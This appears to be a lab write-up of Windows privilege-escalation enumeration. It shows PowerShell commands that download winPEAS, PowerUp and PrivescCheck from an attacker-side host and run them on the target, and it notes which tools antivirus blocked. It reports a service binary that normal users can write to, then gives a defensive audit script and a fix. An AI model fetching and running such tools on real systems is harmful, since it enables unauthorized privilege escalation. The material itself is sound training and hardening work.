PEAS


Automated enumeration of the HACKSMARTERSEC (10.10.183.209) host, following the manual enumeration.

PS C:\tmp> curl http://10.9.0.130/winPEASany.exe -OutFile .\winPEASany.exe

Delivery complete

PS C:\tmp> .\winPEASany.exe
Program 'winPEASany.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially  
unwanted softwareAt line:1 char:1
+ .\winPEASany.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASany.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Blocked by AV

PowerUp


PS C:\tmp> curl http://10.9.0.130/PowerUp.ps1 -OutFile .\PowerUp.ps1

Delivery complete

PS C:\tmp> . .\PowerUp.ps1
. : Operation did not complete successfully because the file contains a virus or potentially unwanted software. 
At line:1 char:3
+ . .\PowerUp.ps1
+   ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Blocked by AV

PrivescCheck


PS C:\tmp> curl http://10.9.0.130/PrivescCheck.ps1 -OutFile .\PrivescCheck.ps1

Delivery complete

PS C:\tmp> . .\PrivescCheck.ps1

Successfully imported and executed without being flagged by AV.

Services


┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service list (non-default)                        ┃
┃ TYPE     ┃ Base                                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
 
 
Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : cfn-hup
DisplayName : CloudFormation cfn-hup
ImagePath   : "C:\Program Files\Amazon\cfn-bootstrap\winhup.exe"
User        : LocalSystem
StartMode   : Manual
 
Name        : rpcapd
DisplayName : Remote Packet Capture Protocol v.0 (experimental)
ImagePath   : "C:\Program Files (x86)\WinPcap\rpcapd.exe" -d -f "C:\Program Files (x86)\WinPcap\rpcapd.ini"
User        : LocalSystem
StartMode   : Manual
 
Name        : Server Administrator
DisplayName : DSM SA Connection Service
ImagePath   : "C:\Program Files\Dell\SysMgt\oma\bin\dsm_om_connsvc64.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : spoofer-scheduler
DisplayName : Spoofer Scheduler
ImagePath   : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
User        : LocalSystem
StartMode   : Automatic
 
Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled
 
Name        : sshd
DisplayName : OpenSSH SSH Server
ImagePath   : C:\Windows\System32\OpenSSH\sshd.exe
User        : LocalSystem
StartMode   : Automatic

Of these, spoofer-scheduler is the service of interest.

Vulnerable Services


┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service image file permissions                    ┃
┃ TYPE     ┃ Base                                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on  ┃
┃ a service's binary or its folder.                            ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
 
 
Name              : spoofer-scheduler
DisplayName       : Spoofer Scheduler
User              : LocalSystem
ImagePath         : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
StartMode         : Automatic
Type              : Win32OwnProcess
RegistryKey       : HKLM\SYSTEM\CurrentControlSet\Services
RegistryPath      : HKLM\SYSTEM\CurrentControlSet\Services\spoofer-scheduler
Status            : Running
UserCanStart      : True
UserCanStop       : True
ModifiablePath    : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
IdentityReference : BUILTIN\Users (S-1-5-32-545)
Permissions       : AllAccess
 
 
 
[*] Status: Vulnerable - Severity: High - Execution time: 00:00:16.474

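Confirmed: BUILTIN\Users has AllAccess on the spoofer-scheduler binary, the service runs as LocalSystem, and the current user can stop and start it.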
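
The same condition can be audited from the defensive side. The script below is an added example, not part of the original notes and not PrivescCheck's code: it lists every service whose binary or parent folder grants write-type rights to a low-privileged group. The names Get-WeakAce, $LowPrivSids and $WriteMask are hypothetical, and the SID list and rights mask are assumptions about what counts as "low-privileged" and "writable".

```powershell
# Added example: audit service binaries and their folders for write access
# granted to low-privileged groups (assumed SID list below).
$LowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-4',       # INTERACTIVE
    'S-1-5-32-545'   # BUILTIN\Users (the identity flagged in the output above)
)
# WriteData | AppendData | Delete | ChangePermissions | TakeOwnership | GENERIC_ALL | GENERIC_WRITE
$WriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
$SidType   = [System.Security.Principal.SecurityIdentifier]

function Get-WeakAce {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $isDir = Test-Path -LiteralPath $Path -PathType Container
    # Skip inherit-only ACEs (PropagationFlags bit 2) on folders: they apply to
    # children, not to the folder itself.
    $acl.GetAccessRules($true, $true, $SidType) | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivSids -contains $_.IdentityReference.Value -and
        ([int]$_.FileSystemRights -band $WriteMask) -ne 0 -and
        -not ($isDir -and ([int]$_.PropagationFlags -band 2))
    }
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    # ImagePath is either quoted (possibly with arguments) or unquoted with
    # spaces, as spoofer-scheduler's is; take the path up to the first ".exe".
    if ($svc.PathName -notmatch '^\s*(?:"(?<exe>[^"]+)"|(?<exe>.+?\.exe))') { continue }
    $exe = [Environment]::ExpandEnvironmentVariables($Matches['exe'])
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }

    foreach ($target in $exe, (Split-Path -Path $exe -Parent)) {
        foreach ($ace in Get-WeakAce -Path $target) {
            [pscustomobject]@{
                Service = $svc.Name
                RunsAs  = $svc.StartName
                Target  = $target
                Sid     = $ace.IdentityReference.Value
                Rights  = $ace.FileSystemRights
            }
        }
    }
}
$findings | Sort-Object Service, Target | Format-Table -AutoSize -Wrap
```

A row whose RunsAs is LocalSystem is the same condition PrivescCheck reported for spoofer-scheduler. The fix is to remove the write grant from the binary and its folder so that only administrators and SYSTEM can modify them.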